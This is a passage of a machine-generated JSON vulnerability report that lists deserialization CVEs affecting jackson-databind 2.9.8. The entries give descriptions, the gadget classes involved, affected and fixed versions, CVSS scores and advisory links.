Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11112/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-20190"]}],"cve":"CVE-2021-20190","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-01-20T21:20:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-20190"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210219-0008"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1916633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in jackson-databind A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1916633"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"NetApp Advisory ntap-20210219-0008","url":"https://security.netapp.com/advisory/ntap-20210219-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"]}],"title":"CVE-2021-20190/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9546"]}],"cve":"CVE-2020-9546","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:08:40","ids":[{"system_name":"CVE Record","text":"CVE-2020-9546"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9546/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35728"]}],"cve":"CVE-2020-35728","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:24","ids":[{"system_name":"CVE Record","text":"CVE-2020-35728"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210129-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadget exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadget exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"NetApp Advisory ntap-20210129-0007","url":"https://security.netapp.com/advisory/ntap-20210129-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35728/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10969"]}],"cve":"CVE-2020-10969","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:36:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-10969"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10969/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36182"]}],"cve":"CVE-2020-36182","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-36182"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36182/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36180"]}],"cve":"CVE-2020-36180","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-36180"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36180/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36185"]}],"cve":"CVE-2020-36185","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-36185"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36185/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10672"]}],"cve":"CVE-2020-10672","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T16:32:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-10672"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 